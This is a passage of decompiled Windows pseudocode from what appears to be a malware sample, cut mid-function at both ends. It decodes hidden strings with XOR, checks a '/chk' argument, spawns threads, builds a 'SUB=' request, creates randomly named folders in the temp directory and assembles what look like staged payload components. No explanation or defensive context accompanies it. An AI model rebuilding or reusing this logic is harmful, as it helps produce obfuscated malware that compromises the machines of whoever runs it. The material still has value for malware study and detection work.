						_t1279 =  *(_t1256 - 4);
						_t1474 = _t1573 + 0x23;
						if(_t1230 - _t1279 + 0xfffffffc > 0x1f) {
							L78:
							E00411D17(_t1244, _t1279, _t1474, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t1607);
							_t1608 = _t1612;
							_push(_t1279);
							__eflags =  *((intOrPtr*)(_t1474 + 0x14)) - 0x10;
							_t753 = _t1474;
							_push(_t1244);
							_push(_t1585);
							_push(_t1575);
							_t1587 = _t1279;
							if( *((intOrPtr*)(_t1474 + 0x14)) >= 0x10) {
								_t753 =  *_t1474;
							}
							__eflags =  *((intOrPtr*)(_t1587 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t1587 + 0x14)) >= 0x10) {
								_t1279 =  *_t1587;
							}
							_t1245 =  *((intOrPtr*)(_t1474 + 0x10));
							_t1484 = _t1587 + 0x10;
							_t1577 =  *_t1484;
							_v12 = _t1484;
							_t754 = E00402180(_t1279, _t1577, _t1279, _t753, _t1245);
							_t1486 = _t754;
							_t1614 = _t1612 + 0xc;
							__eflags = _t1486 - 0xffffffff;
							if(_t1486 != 0xffffffff) {
								__eflags = _t1577 - _t1486;
								if(_t1577 < _t1486) {
									E00402170(_t1279, _t1486);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t1245);
									_t1247 = _t1614;
									_t1617 = (_t1614 - 0x00000008 & 0xfffffff8) + 4;
									_push(_t1608);
									_v448 =  *((intOrPtr*)(_t1247 + 4));
									_push(0xffffffff);
									_push(0x42b0af);
									_push( *[fs:0x0]);
									_push(_t1247);
									_t757 =  *0x43b054; // 0x41d6575c
									_t758 = _t757 ^ _t1617;
									_v472 = _t758;
									_push(_t1587);
									_push(_t1577);
									_push(_t758);
									 *[fs:0x0] =  &_v464;
									_v456 = 1;
									E004165E7(_t1279, E00417043(_t1279, _t1486, 0));
									_t1487 =  *(_t1247 + 0x20);
									_t1589 =  *((intOrPtr*)(_t1247 + 0x30));
									_t1620 = _t1617 - 0xa70 + 8;
									__eflags =  *((intOrPtr*)(_t1247 + 0x34)) - 0x10;
									_v1005 =  *((intOrPtr*)(_t1247 + 0x34)) - 0x10 >= 0;
									_t1281 =  >=  ? _t1487 : _t1247 + 0x20;
									__eflags = _t1589 - 3;
									if(_t1589 != 3) {
										L97:
										__eflags = _v573;
										_t1281 =  !=  ? _t1487 : _t1247 + 0x20;
										__eflags = _t1589 - 4;
										if(_t1589 != 4) {
											goto L108;
										}
										_t1167 =  *_t1281;
										_t1487 = "/chk";
										__eflags = _t1167 -  *_t1487;
										if(_t1167 !=  *_t1487) {
											__eflags = _t1167 -  *_t1487;
											if(_t1167 !=  *_t1487) {
												L105:
												asm("sbb eax, eax");
												_t1168 = _t1167 | 0x00000001;
												__eflags = _t1168;
												L106:
												__eflags = _t1168;
												if(__eflags != 0) {
													goto L108;
												}
												goto L107;
											}
											_t1167 = _t1281[1];
											__eflags = _t1167 - _t1487[1];
											if(_t1167 != _t1487[1]) {
												goto L105;
											}
											_t1167 = _t1281[2];
											__eflags = _t1167 - _t1487[2];
											if(_t1167 != _t1487[2]) {
												goto L105;
											}
											_t1167 = _t1281[3];
											__eflags = _t1167 - _t1487[3];
											if(_t1167 != _t1487[3]) {
												goto L105;
											}
											_t1168 = 0;
											goto L106;
										}
										_t1281 =  &(_t1281[_t1589]);
										_t1168 = 0;
										goto L106;
									} else {
										_t1172 =  *_t1281 & 0x000000ff;
										__eflags = _t1172 - 0x63;
										if(_t1172 != 0x63) {
											L95:
											asm("sbb eax, eax");
											_t1173 = _t1172 | 0x00000001;
											__eflags = _t1173;
											L96:
											__eflags = _t1173;
											if(__eflags == 0) {
												L107:
												E00407F90( &_v228, _t1281);
												_t1620 = _t1620 - 0xc;
												_t1281 =  &_v228;
												E00409DF0( &_v228, _t1487, __eflags, "test");
												E0041647D(0);
												L108:
												CreateThread(0, 0, E00404FB0, 0, 0, 0);
												_t1579 = Sleep;
												Sleep(0xbb8);
												_t1590 =  *((intOrPtr*)( *[fs:0x2c]));
												_t764 =  *0x43ce20; // 0x0
												__eflags = _t764 -  *((intOrPtr*)(_t1590 + 4));
												if(_t764 >  *((intOrPtr*)(_t1590 + 4))) {
													E0040D738(_t764, 0x43ce20);
													_t1620 = _t1620 + 4;
													__eflags =  *0x43ce20 - 0xffffffff;
													if(__eflags == 0) {
														asm("movaps xmm0, [0x437d40]");
														asm("movups [0x43cedc], xmm0");
														E0040DA4A(_t1281, __eflags, 0x42b860);
														E0040D6EE(0x43ce20);
														_t1620 = _t1620 + 8;
													}
												}
												__eflags =  *0x43ceeb;
												if( *0x43ceeb != 0) {
													asm("movups xmm0, [0x43cedc]");
													asm("movaps xmm1, [0x437d50]");
													asm("pxor xmm1, xmm0");
													asm("movups [0x43cedc], xmm1");
												}
												_t1283 = 0x43cedc;
												_v724 = 0;
												_v708 = 0;
												_v704 = 0xf;
												_v724 = 0;
												_t164 = _t1283 + 1; // 0x43cedd
												_t1488 = _t164;
												do {
													_t765 =  *_t1283;
													_t1283 = _t1283 + 1;
													__eflags = _t765;
												} while (_t765 != 0);
												_push(_t1283 - _t1488);
												E00402030( &_v724, 0x43cedc);
												_v24 = 2;
												_t767 =  *0x43cfb0; // 0x0
												_v592 = 0x1c001f1d;
												_v588 = 0x1c001e1f;
												_v584 = 0x1a1f001e;
												_v580 = 0x2e17;
												__eflags = _t767 -  *((intOrPtr*)(_t1590 + 4));
												if(_t767 >  *((intOrPtr*)(_t1590 + 4))) {
													E0040D738(_t767, 0x43cfb0);
													_t1620 = _t1620 + 4;
													__eflags =  *0x43cfb0 - 0xffffffff;
													if(__eflags == 0) {
														asm("movq xmm0, [ebp-0x23c]");
														 *0x43cdf4 = _v584;
														asm("movq [0x43cdec], xmm0");
														 *0x43cdf8 = _v580;
														E0040DA4A( &_v724, __eflags, 0x42b840);
														E0040D6EE(0x43cfb0);
														_t1620 = _t1620 + 8;
													}
												}
												__eflags =  *0x43cdf9;
												if( *0x43cdf9 == 0) {
													L121:
													_t1286 = 0x43cdec;
													_v748 = 0;
													_v732 = 0;
													_v728 = 0xf;
													_v748 = 0;
													_t180 = _t1286 + 1; // 0x43cded
													_t1489 = _t180;
													do {
														_t768 =  *_t1286;
														_t1286 = _t1286 + 1;
														__eflags = _t768;
													} while (_t768 != 0);
													_push(_t1286 - _t1489);
													E00402030( &_v748, 0x43cdec);
													_v24 = 3;
													_t770 =  *0x43ce44; // 0x0
													_v592 = 0x1c1f1c;
													_v588 = 0x1c171f;
													_v584 = 0x1f1a1c;
													_v580 = 0x181f;
													_v573 = 0x2e;
													__eflags = _t770 -  *((intOrPtr*)(_t1590 + 4));
													if(_t770 >  *((intOrPtr*)(_t1590 + 4))) {
														E0040D738(_t770, 0x43ce44);
														_t1620 = _t1620 + 4;
														__eflags =  *0x43ce44 - 0xffffffff;
														if(__eflags == 0) {
															asm("movq xmm0, [ebp-0x23c]");
															 *0x43cfa4 = _v584;
															 *0x43cfa8 = _v580;
															asm("movq [0x43cf9c], xmm0");
															 *0x43cfaa = _v573;
															E0040DA4A( &_v748, __eflags, 0x42b810);
															E0040D6EE(0x43ce44);
															_t1620 = _t1620 + 8;
														}
													}
													__eflags =  *0x43cfaa;
													if( *0x43cfaa == 0) {
														L129:
														_t1289 = 0x43cf9c;
														_v772 = 0;
														_v756 = 0;
														_v752 = 0xf;
														_v772 = 0;
														_t198 = _t1289 + 1; // 0x43cf9d
														_t1490 = _t198;
														asm("o16 nop [eax+eax]");
														do {
															_t771 =  *_t1289;
															_t1289 = _t1289 + 1;
															__eflags = _t771;
														} while (_t771 != 0);
														_push(_t1289 - _t1490);
														E00402030( &_v772, 0x43cf9c);
														_v24 = 4;
														_t773 =  *0x43cf14; // 0x0
														_v612 = 0x5c4f5c4c;
														_v608 = 0x465e0057;
														_v604 = 0x2e5e;
														__eflags = _t773 -  *((intOrPtr*)(_t1590 + 4));
														if(_t773 >  *((intOrPtr*)(_t1590 + 4))) {
															E0040D738(_t773, 0x43cf14);
															_t1620 = _t1620 + 4;
															__eflags =  *0x43cf14 - 0xffffffff;
															if(__eflags == 0) {
																asm("movaps xmm0, [0x437d70]");
																asm("movups [0x43cdfc], xmm0");
																asm("movq xmm0, [ebp-0x250]");
																asm("movq [0x43ce0c], xmm0");
																 *0x43ce14 = _v604;
																E0040DA4A( &_v772, __eflags, 0x42b7f0);
																E0040D6EE(0x43cf14);
																_t1620 = _t1620 + 8;
															}
														}
														__eflags =  *0x43ce15;
														if( *0x43ce15 == 0) {
															L137:
															_t1292 = 0x43cdfc;
															_v796 = 0;
															_v780 = 0;
															_v776 = 0xf;
															_v796 = 0;
															_t212 = _t1292 + 1; // 0x43cdfd
															_t1491 = _t212;
															asm("o16 nop [eax+eax]");
															do {
																_t774 =  *_t1292;
																_t1292 = _t1292 + 1;
																__eflags = _t774;
															} while (_t774 != 0);
															_push(_t1292 - _t1491);
															E00402030( &_v796, 0x43cdfc);
															_v24 = 5;
															_push(4);
															_v2660 = 0;
															_v2644 = 0;
															_v2640 = 0xf;
															_v2660 = 0;
															E00402030( &_v2660, "SUB=");
															_v24 = 6;
															L79();
															_v24 = 5;
															_t1493 = _v2640;
															__eflags = _t1493 - 0x10;
															if(_t1493 < 0x10) {
																L143:
																_push(1);
																_v2660 = 0;
																_v2644 = 0;
																_v2640 = 0xf;
																_v2660 = 0;
																E00402030( &_v2660, "/");
																_v24 = 7;
																_t1298 = _t1247 + 8;
																L79();
																_v24 = 5;
																_t1495 = _v2640;
																__eflags = _t1495 - 0x10;
																if(_t1495 < 0x10) {
																	L147:
																	_v2612 = E00404120(_t1247, _t1298);
																	_t779 = E00404800(_t1247, __eflags);
																	_v652 = 0;
																	_v2584 = _t779;
																	_v636 = 0;
																	_v632 = 0xf;
																	_v652 = 0;
																	_v700 = 0;
																	_v684 = 0;
																	_v680 = 0xf;
																	_v700 = 0;
																	_v24 = 9;
																	_t780 =  *0x43cf98;
																	_v580 = 0x2e564743;
																	__eflags =  *0x43cf98 -  *((intOrPtr*)(_t1590 + 4));
																	if( *0x43cf98 >  *((intOrPtr*)(_t1590 + 4))) {
																		E0040D738(_t780, 0x43cf98);
																		_t1620 = _t1620 + 4;
																		__eflags =  *0x43cf98 - 0xffffffff;
																		if(__eflags == 0) {
																			 *0x43cdb0 = _v580;
																			E0040DA4A(_t1298, __eflags, 0x42b7e0);
																			E0040D6EE(0x43cf98);
																			_t1620 = _t1620 + 8;
																		}
																	}
																	_t781 =  *0x43cdb3;
																	__eflags = _t781;
																	if(_t781 != 0) {
																		 *0x43cdb0 =  *0x43cdb0 ^ 0x0000002e;
																		 *0x43cdb1 =  *0x43cdb1 ^ 0x0000002e;
																		 *0x43cdb2 =  *0x43cdb2 ^ 0x0000002e;
																		_t1133 = _t781 ^ 0x0000002e;
																		__eflags = _t1133;
																		 *0x43cdb3 = _t1133;
																	}
																	_t1299 = 0x43cdb0;
																	_v2636 = 0;
																	_v2620 = 0;
																	_v2616 = 0xf;
																	do {
																		_t782 =  *_t1299;
																		_t1299 =  &(_t1299[1]);
																		__eflags = _t782;
																	} while (_t782 != 0);
																	_push(_t1299 - 0x43cdb1);
																	_t1301 =  &_v2636;
																	E00402030(_t1301, 0x43cdb0);
																	_push(_t1301);
																	_push( &_v2636);
																	_t1302 = _t1247 + 8;
																	_t785 = E0040A200(_t1247 + 8);
																	_t1497 = _v2616;
																	_v580 = _t785;
																	__eflags = _t1497 - 0x10;
																	if(_t1497 < 0x10) {
																		L158:
																		__eflags = _t785;
																		if(_t785 != 0) {
																			_t786 =  *0x43cd88;
																			_v580 = 0x5b4b;
																			_v573 = 0x2e;
																			__eflags =  *0x43cd88 -  *((intOrPtr*)(_t1590 + 4));
																			if( *0x43cd88 >  *((intOrPtr*)(_t1590 + 4))) {
																				E0040D738(_t786, 0x43cd88);
																				_t1620 = _t1620 + 4;
																				__eflags =  *0x43cd88 - 0xffffffff;
																				if(__eflags == 0) {
																					 *0x43cf64 = _v580;
																					 *0x43cf66 = _v573;
																					E0040DA4A(_t1302, __eflags, E0042B770);
																					E0040D6EE(0x43cd88);
																					_t1620 = _t1620 + 8;
																				}
																			}
																			_t787 =  *0x43cf66;
																			__eflags = _t787;
																			if(_t787 != 0) {
																				 *0x43cf64 =  *0x43cf64 ^ 0x0000002e;
																				 *0x43cf65 =  *0x43cf65 ^ 0x0000002e;
																				_t1072 = _t787 ^ 0x0000002e;
																				__eflags = _t1072;
																				 *0x43cf66 = _t1072;
																			}
																			_t1303 = 0x43cf64;
																			_v2636 = 0;
																			_v2620 = 0;
																			_v2616 = 0xf;
																			do {
																				_t788 =  *_t1303;
																				_t1303 =  &(_t1303[1]);
																				__eflags = _t788;
																			} while (_t788 != 0);
																			_push(_t1303 - 0x43cf65);
																			_t1305 =  &_v2636;
																			E00402030(_t1305, 0x43cf64);
																			_push(_t1305);
																			_push( &_v2636);
																			_t1306 = _t1247 + 8;
																			_t791 = E0040A200(_t1247 + 8);
																			_t1499 = _v2616;
																			_v580 = _t791;
																			__eflags = _t1499 - 0x10;
																			if(_t1499 < 0x10) {
																				L210:
																				__eflags = _v580;
																				_t792 =  *((intOrPtr*)(_t1590 + 4));
																				if(_v580 != 0) {
																					_v580 = 0x5d5b;
																					_v573 = 0x2e;
																					__eflags =  *0x43ceec - _t792;
																					if( *0x43ceec > _t792) {
																						E0040D738(_t792, 0x43ceec);
																						_t1620 = _t1620 + 4;
																						__eflags =  *0x43ceec - 0xffffffff;
																						if(__eflags == 0) {
																							 *0x43cf1c = _v580;
																							 *0x43cf1e = _v573;
																							E0040DA4A(_t1306, __eflags, E0042B740);
																							E0040D6EE(0x43ceec);
																							_t1620 = _t1620 + 8;
																						}
																					}
																					_t793 =  *0x43cf1e;
																					__eflags = _t793;
																					if(_t793 != 0) {
																						 *0x43cf1c =  *0x43cf1c ^ 0x0000002e;
																						 *0x43cf1d =  *0x43cf1d ^ 0x0000002e;
																						_t1041 = _t793 ^ 0x0000002e;
																						__eflags = _t1041;
																						 *0x43cf1e = _t1041;
																					}
																					_t1307 = 0x43cf1c;
																					_v2636 = 0;
																					_v2620 = 0;
																					_v2616 = 0xf;
																					do {
																						_t794 =  *_t1307;
																						_t1307 =  &(_t1307[1]);
																						__eflags = _t794;
																					} while (_t794 != 0);
																					_push(_t1307 - 0x43cf1d);
																					_t1309 =  &_v2636;
																					E00402030(_t1309, 0x43cf1c);
																					_push(_t1309);
																					_push( &_v2636);
																					_t1310 = _t1247 + 8;
																					_t797 = E0040A200(_t1247 + 8);
																					_t1501 = _v2616;
																					_v580 = _t797;
																					__eflags = _t1501 - 0x10;
																					if(_t1501 < 0x10) {
																						L241:
																						__eflags = _t797;
																						if(_t797 != 0) {
																							L262:
																							__eflags = _v2612;
																							if(_v2612 != 0) {
																								_push(1);
																								_t1310 =  &_v700;
																								E00402030( &_v700, "n");
																							}
																							__eflags = _v2584;
																							if(_v2584 != 0) {
																								_push(1);
																								_t1310 =  &_v700;
																								E00402030( &_v700, "r");
																							}
																							E0040F2F0(_t1579,  &_v1268, 0, 0x148);
																							_v1256 = "1";
																							_v1264 = 0x7a120;
																							_v1268 = E0040D5FD(_t1579, _t1590, __eflags, 0x7a120);
																							E0040F2F0(_t1579, _t800, 0, _v1264);
																							_t1623 = _t1620 + 0x1c;
																							_v1232 = 0xfde9;
																							_v1212 = 0;
																							_v1208 = 0;
																							_v1204 = 0;
																							_v24 = 0xa;
																							_t802 =  *0x43cd38;
																							_v588 = 0x4c5b5d08;
																							_v584 = 0x4b5c5a5d;
																							_v580 = 0x2e13434f;
																							__eflags =  *0x43cd38 -  *((intOrPtr*)(_t1590 + 4));
																							if( *0x43cd38 >  *((intOrPtr*)(_t1590 + 4))) {
																								E0040D738(_t802, 0x43cd38);
																								_t1623 = _t1623 + 4;
																								__eflags =  *0x43cd38 - 0xffffffff;
																								if(__eflags == 0) {
																									asm("movq xmm0, [ebp-0x238]");
																									asm("movq [0x43cf6c], xmm0");
																									 *0x43cf74 = _v580;
																									E0040DA4A(_t1310, __eflags, 0x42b6c0);
																									E0040D6EE(0x43cd38);
																									_t1623 = _t1623 + 8;
																								}
																							}
																							__eflags =  *0x43cf77;
																							if( *0x43cf77 == 0) {
																								L272:
																								_t1311 = 0x43cf6c;
																								_v2636 = 0;
																								_v2620 = 0;
																								_v2616 = 0xf;
																								_v2636 = 0;
																								asm("o16 nop [eax+eax]");
																								do {
																									_t803 =  *_t1311;
																									_t1311 = _t1311 + 1;
																									__eflags = _t803;
																								} while (_t803 != 0);
																								_push(_t1311 - 0x43cf6d);
																								E00402030( &_v2636, 0x43cf6c);
																								_v24 = 0xb;
																								_t805 =  *0x43ce8c;
																								_v588 = 0x5c5a5d08;
																								_v584 = 0x13434f4b;
																								_v573 = 0x2e;
																								__eflags =  *0x43ce8c -  *((intOrPtr*)(_t1590 + 4));
																								if( *0x43ce8c >  *((intOrPtr*)(_t1590 + 4))) {
																									E0040D738(_t805, 0x43ce8c);
																									_t1623 = _t1623 + 4;
																									__eflags =  *0x43ce8c - 0xffffffff;
																									if(__eflags == 0) {
																										asm("movq xmm0, [ebp-0x238]");
																										asm("movq [0x43cd3c], xmm0");
																										 *0x43cd44 = _v573;
																										E0040DA4A( &_v2636, __eflags, 0x42b6e0);
																										E0040D6EE(0x43ce8c);
																										_t1623 = _t1623 + 8;
																									}
																								}
																								_t806 =  *0x43cd44;
																								__eflags = _t806;
																								if(_t806 != 0) {
																									 *0x43cd3c =  *0x43cd3c ^ 0x0000002e;
																									 *0x43cd3d =  *0x43cd3d ^ 0x0000002e;
																									 *0x43cd3e =  *0x43cd3e ^ 0x0000002e;
																									 *0x43cd3f =  *0x43cd3f ^ 0x0000002e;
																									 *0x43cd40 =  *0x43cd40 ^ 0x0000002e;
																									 *0x43cd41 =  *0x43cd41 ^ 0x0000002e;
																									 *0x43cd42 =  *0x43cd42 ^ 0x0000002e;
																									 *0x43cd43 =  *0x43cd43 ^ 0x0000002e;
																									_t1002 = _t806 ^ 0x0000002e;
																									__eflags = _t1002;
																									 *0x43cd44 = _t1002;
																								}
																								_t1314 = 0x43cd3c;
																								_v600 = 0;
																								_v584 = 0;
																								_v580 = 0xf;
																								_v600 = 0;
																								do {
																									_t807 =  *_t1314;
																									_t1314 =  &(_t1314[1]);
																									__eflags = _t807;
																								} while (_t807 != 0);
																								_push(_t1314 - 0x43cd3d);
																								E00402030( &_v600, 0x43cd3c);
																								_v24 = 0xc;
																								_t809 =  *0x43ce68;
																								_v573 = 0x2e;
																								__eflags =  *0x43ce68 -  *((intOrPtr*)(_t1590 + 4));
																								if( *0x43ce68 >  *((intOrPtr*)(_t1590 + 4))) {
																									E0040D738(_t809, 0x43ce68);
																									_t1623 = _t1623 + 4;
																									__eflags =  *0x43ce68 - 0xffffffff;
																									if(__eflags == 0) {
																										asm("movaps xmm0, [0x437d30]");
																										asm("movups [0x43cd60], xmm0");
																										 *0x43cd70 = _v573;
																										E0040DA4A( &_v600, __eflags, 0x42b700);
																										E0040D6EE(0x43ce68);
																										_t1623 = _t1623 + 8;
																									}
																								}
																								_t810 =  *0x43cd70;
																								__eflags = _t810;
																								if(_t810 != 0) {
																									asm("movups xmm0, [0x43cd60]");
																									asm("movaps xmm1, [0x437d50]");
																									asm("pxor xmm1, xmm0");
																									 *0x43cd70 = _t810 ^ 0x0000002e;
																									asm("movups [0x43cd60], xmm1");
																								}
																								_t1317 = 0x43cd60;
																								_v2660 = 0;
																								_v2644 = 0;
																								_v2640 = 0xf;
																								_v2660 = 0;
																								do {
																									_t811 =  *_t1317;
																									_t1317 = _t1317 + 1;
																									__eflags = _t811;
																								} while (_t811 != 0);
																								_push(_t1317 - 0x43cd61);
																								E00402030( &_v2660, 0x43cd60);
																								_v24 = 0xd;
																								__eflags = _v704 - 0x10;
																								_t814 =  >=  ? _v724 :  &_v724;
																								_t815 = E0040BE50( &_v2660,  &_v2660,  >=  ? _v724 :  &_v724, _v708);
																								_v2684 = 0;
																								_v2668 = 0;
																								_v2664 = 0;
																								asm("movups xmm0, [eax]");
																								asm("movups [ebp-0xa68], xmm0");
																								asm("movq xmm0, [eax+0x10]");
																								asm("movq [ebp-0xa58], xmm0");
																								 *(_t815 + 0x10) = 0;
																								 *(_t815 + 0x14) = 0xf;
																								 *_t815 = 0;
																								_v24 = 0xe;
																								_t817 = E0040B190( &_v628,  &_v2684, _t1247 + 0x20);
																								_v24 = 0xf;
																								_push( &_v600);
																								E0040BC70( &_v2608, _t1590, _v2584, _t817);
																								_v24 = 0x10;
																								_t820 = E0040B190( &_v676,  &_v2608,  &_v700);
																								_v24 = 0x11;
																								_push( &_v2636);
																								E0040BC70( &_v2708, _t1590, _v2584, _t820);
																								_v24 = 0x12;
																								E0040B190( &_v868,  &_v2708, _t1247 + 8);
																								_t1626 = _t1623 + 0xc;
																								_v24 = 0x14;
																								_t1508 = _v2688;
																								__eflags = _t1508 - 0x10;
																								if(_t1508 < 0x10) {
																									L292:
																									_v2692 = 0;
																									_v2688 = 0xf;
																									_v2708 = 0;
																									_v24 = 0x15;
																									_t1509 = _v656;
																									__eflags = _t1509 - 0x10;
																									if(_t1509 < 0x10) {
																										L296:
																										_v660 = 0;
																										_v656 = 0xf;
																										_v676 = 0;
																										_v24 = 0x16;
																										_t1510 = _v2588;
																										__eflags = _t1510 - 0x10;
																										if(_t1510 < 0x10) {
																											L300:
																											_v2592 = 0;
																											_v2588 = 0xf;
																											_v2608 = 0;
																											_v24 = 0x17;
																											_t1511 = _v608;
																											__eflags = _t1511 - 0x10;
																											if(_t1511 < 0x10) {
																												L304:
																												_v612 = 0;
																												_v608 = 0xf;
																												_v628 = 0;
																												_v24 = 0x18;
																												_t1512 = _v2664;
																												__eflags = _t1512 - 0x10;
																												if(_t1512 < 0x10) {
																													L308:
																													_v2668 = 0;
																													_v2664 = 0xf;
																													_v2684 = 0;
																													_v24 = 0x19;
																													_t1513 = _v2640;
																													__eflags = _t1513 - 0x10;
																													if(_t1513 < 0x10) {
																														L312:
																														_v2644 = 0;
																														_v2640 = 0xf;
																														_v2660 = 0;
																														_v24 = 0x1a;
																														_t1514 = _v580;
																														__eflags = _t1514 - 0x10;
																														if(_t1514 < 0x10) {
																															L316:
																															_v24 = 0x1b;
																															_t1515 = _v2616;
																															__eflags = _t1515 - 0x10;
																															if(_t1515 < 0x10) {
																																while(1) {
																																	__eflags = _v848 - 0x10;
																																	_t824 = _v1224;
																																	_t1592 =  >=  ? _v868 :  &_v868;
																																	_v1216 = 0;
																																	__eflags = _t824;
																																	if(_t824 != 0) {
																																		L0040D3BD(_t824);
																																		_t1626 = _t1626 + 4;
																																		_v1224 = 0;
																																	}
																																	_t825 = L00401900(_t1247,  &_v1268, _t1579, _t1592);
																																	__eflags = _t825;
																																	if(_t825 == 0) {
																																		goto L340;
																																	}
																																	__eflags = _v1216;
																																	_v600 = 0;
																																	_t1517 =  ==  ? 0 : _v1228;
																																	_v584 = 0;
																																	_t1329 =  ==  ? 0 : _v1228;
																																	_v580 = 0xf;
																																	_v600 = 0;
																																	_t1593 = _t1329 + 1;
																																	do {
																																		_t828 =  *_t1329;
																																		_t1329 = _t1329 + 1;
																																		__eflags = _t828;
																																	} while (_t828 != 0);
																																	_push(_t1329 - _t1593);
																																	E00402030( &_v600, _t1517);
																																	_v24 = 0x1c;
																																	_t1518 = _v580;
																																	__eflags = _t1518 - 0x10;
																																	_t1332 = _v600;
																																	_t1594 = _v584;
																																	_v573 = _t1518 - 0x10 >= 0;
																																	_t831 =  >=  ? _t1332 :  &_v600;
																																	__eflags = _t1594 - 1;
																																	if(_t1594 != 1) {
																																		L331:
																																		__eflags = _v573;
																																		_t833 =  !=  ? _t1332 :  &_v600;
																																		__eflags = _t1594 - 1;
																																		if(_t1594 != 1) {
																																			L336:
																																			_v24 = 0x1b;
																																			__eflags = _t1518 - 0x10;
																																			if(_t1518 < 0x10) {
																																				goto L340;
																																			}
																																			_t1519 = _t1518 + 1;
																																			_t834 = _t1332;
																																			__eflags = _t1519 - 0x1000;
																																			if(_t1519 < 0x1000) {
																																				L339:
																																				_push(_t1519);
																																				E0040D5EF(_t1332);
																																				_t1626 = _t1626 + 8;
																																				goto L340;
																																			}
																																			_t1332 =  *((intOrPtr*)(_t1332 - 4));
																																			_t1519 = _t1519 + 0x23;
																																			__eflags = _t834 - _t1332 + 0xfffffffc - 0x1f;
																																			if(__eflags > 0) {
																																				L319:
																																				E00411D17(_t1247, _t1332, _t1519, __eflags);
																																				L320:
																																				_push(_t1519);
																																				E0040D5EF(_t1332);
																																				_t1626 = _t1626 + 8;
																																				continue;
																																			}
																																			goto L339;
																																		}
																																		_t840 =  *_t833 & 0x000000ff;
																																		__eflags = _t840 - 0x31;
																																		if(_t840 != 0x31) {
																																			asm("sbb eax, eax");
																																			_t841 = _t840 | 0x00000001;
																																			__eflags = _t841;
																																		} else {
																																			_t841 = 0;
																																		}
																																		__eflags = _t841;
																																		if(_t841 == 0) {
																																			E00401DC0(_t1247,  &_v600);
																																			E0040A470( &_v892);
																																			_t1627 = _t1626 - 0x10;
																																			_v24 = 0x1d;
																																			E00401250( &_v2580, "0");
																																			_v24 = 0x1e;
																																			while(1) {
																																				_t847 = E00401E90( &_v676, E0040A110(E004079E0(_t1247, _t1518, _t1579, _t1594)));
																																				_t1518 =  &_v748;
																																				_v24 = 0x21;
																																				_t848 = E0040B130( &_v628,  &_v748, _t847);
																																				_t1627 = _t1627 + 4;
																																				_v24 = 0x22;
																																				_t850 = E00401BF0(_t1247,  &_v2580, _t1579, E00401D80(_t848));
																																				_t1594 = _t850;
																																				E00401DC0(_t1247,  &_v628);
																																				_v24 = 0x1e;
																																				E00401DC0(_t1247,  &_v676);
																																				__eflags = _t850;
																																				if(_t850 == 0) {
																																					goto L345;
																																				}
																																				E00401D90( &_v892, E00401C60( &_v2580));
																																				_t856 = E00401D70( &_v892);
																																				__eflags = _t856 - 0xa;
																																				if(_t856 <= 0xa) {
																																					goto L345;
																																				}
																																				__eflags = _t856 - 0x64;
																																				if(_t856 < 0x64) {
																																					_t1628 = _t1627 - 0x10;
																																					_t1595 = 0;
																																					E00401250( &_v1596, "1");
																																					_v24 = 0x23;
																																					__eflags = _v2612;
																																					if(_v2612 != 0) {
																																						L355:
																																						E0040F2F0(_t1579,  &_v572, 0, 0x104);
																																						_t1629 = _t1628 + 0xc;
																																						GetTempPathA(0x104,  &_v572);
																																						E00401E90( &_v916,  &_v572);
																																						_t1348 =  &_v820;
																																						E0040A470( &_v820);
																																						_v24 = 0x29;
																																						_t1596 = 0x16;
																																						asm("o16 nop [eax+eax]");
																																						do {
																																							_t865 = E004165C6(_t1348, __eflags);
																																							asm("cdq");
																																							_t867 = E00404DD0( &_v676, _t865 % _t1596 + 8);
																																							_v24 = 0x2a;
																																							_t868 = E0040B130( &_v628,  &_v916, _t867);
																																							_t1629 = _t1629 + 4;
																																							E00401E10(_t1247,  &_v820, _t868);
																																							E00401DC0(_t1247,  &_v628);
																																							_v24 = 0x29;
																																							E00401DC0(_t1247,  &_v676);
																																							_t1348 =  &_v820;
																																							_t873 = CreateDirectoryA(E00401D80( &_v820), 0);
																																							 *_t1579(0x3e8);
																																							__eflags = _t873;
																																							_t1596 = 0x16;
																																						} while (__eflags == 0);
																																						E00401250( &_v1924, "D");
																																						_v24 = 0x2b;
																																						_t878 = E00401E90( &_v628, E00408E30(E00407B10(_t1247,  &_v916, _t1579, 0x16)));
																																						_v24 = 0x2c;
																																						E0040B130( &_v940,  &_v820, _t878);
																																						_v24 = 0x2e;
																																						E00401DC0(_t1247,  &_v628);
																																						_t883 = E00401E90( &_v2608, E00408E90(E00407BB0(_t1247,  &_v820, _t1579, 0x16)));
																																						_t1524 =  &_v772;
																																						_v24 = 0x31;
																																						_t884 = E0040B130( &_v676,  &_v772, _t883);
																																						_t1632 = _t1629 - 0x10 + 8;
																																						_v24 = 0x32;
																																						_t886 = E00401BF0(_t1247,  &_v1924, _t1579, E00401D80(_t884));
																																						_t1598 = _t886;
																																						E00401DC0(_t1247,  &_v676);
																																						_v24 = 0x2e;
																																						E00401DC0(_t1247,  &_v2608);
																																						__eflags = _t886;
																																						if(_t886 != 0) {
																																							_t941 = E00401D00( &_v1924);
																																							__eflags = _t941 - 0x14;
																																							if(_t941 > 0x14) {
																																								E00401C70( &_v1924, E00401D80( &_v940));
																																							}
																																						}
																																						E00401250( &_v2252, "E");
																																						_v24 = 0x33;
																																						_t892 = E00401E90( &_v2608, E00408E10(E00407C50(_t1524, _t1579, _t1598)));
																																						_v24 = 0x34;
																																						E0040B130( &_v844,  &_v820, _t892);
																																						_v24 = 0x36;
																																						E00401DC0(_t1247,  &_v2608);
																																						_t897 = E00401E90( &_v676, E00408E90(E00407CF0(_t1247,  &_v820, _t1579, _t1598)));
																																						_v24 = 0x39;
																																						_t898 = E0040B130( &_v628,  &_v772, _t897);
																																						_t1626 = _t1632 - 0x10 + 8;
																																						_v24 = 0x3a;
																																						_t900 = E00401BF0(_t1247,  &_v2252, _t1579, E00401D80(_t898));
																																						_t1599 = _t900;
																																						E00401DC0(_t1247,  &_v628);
																																						_v24 = 0x36;
																																						E00401DC0(_t1247,  &_v676);
																																						__eflags = _t900;
																																						if(__eflags != 0) {
																																							__eflags = E00401D00( &_v2252) - 0x14;
																																							if(__eflags > 0) {
																																								E00401C70( &_v2252, E00401D80( &_v844));
																																								_t918 = E00401E90( &_v2636, E0040A140(E00407D90()));
																																								_v24 = 0x3b;
